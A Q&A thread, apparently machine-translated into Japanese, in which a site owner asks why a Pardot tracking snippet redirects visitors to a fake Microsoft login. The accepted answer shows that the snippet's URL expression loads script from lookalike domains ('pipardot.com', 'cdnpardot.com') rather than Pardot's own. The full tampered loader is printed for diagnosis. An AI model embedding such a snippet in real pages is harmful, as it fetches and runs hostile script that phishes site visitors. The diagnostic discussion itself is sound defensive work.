追跡スクリプトは脆弱性を作成します

Question

追跡スクリプトを提供するサードパーティのサービスを使用しています。ページに埋め込むと、時々人々がフィッシングリンクにリダイレクトされるため、ある種の脆弱性が生じるようです。大きく派手なテキストは、Microsoftログインのふりをします。

これはスクリプトです：

<script type="text/javascript"> piAId = '<redacted>'; piCId = '<redacted>'; piHostname = 'pi.pardot.com'; (function() { function async_load(){ var s = document.createElement('script'); s.type = 'text/javascript'; s.src = ('https:' == document.location.protocol ? 'https://pi' : 'http://cdn') + 'pardot.com/pd.js'; var c = document.getElementsByTagName('script')[0]; c.parentNode.insertBefore(s, c); } if(window.attachEvent) { window.attachEvent('onload', async_load); } else { window.addEventListener('load', async_load, false); } })(); </script>

スクリプト自体またはホスティング構成の問題により、これを操作できますか？

trognanders · Accepted Answer

このスクリプトにはファンキーなものがあります。

('https:' == document.location.protocol ? 'https://pi' : 'http://cdn') + 'pardot.com/pd.js'

この式は、URL pipardot.comおよびcdnpardot.comを生成します。これらはnot pardot.comに登録されているように見えます。スクリプトが悪いし、どこからスクリプトを入手したかも悪い。

また、元のソースからは良かったかもしれませんが、Webサーバー上の別のエクスプロイトによって編集されました。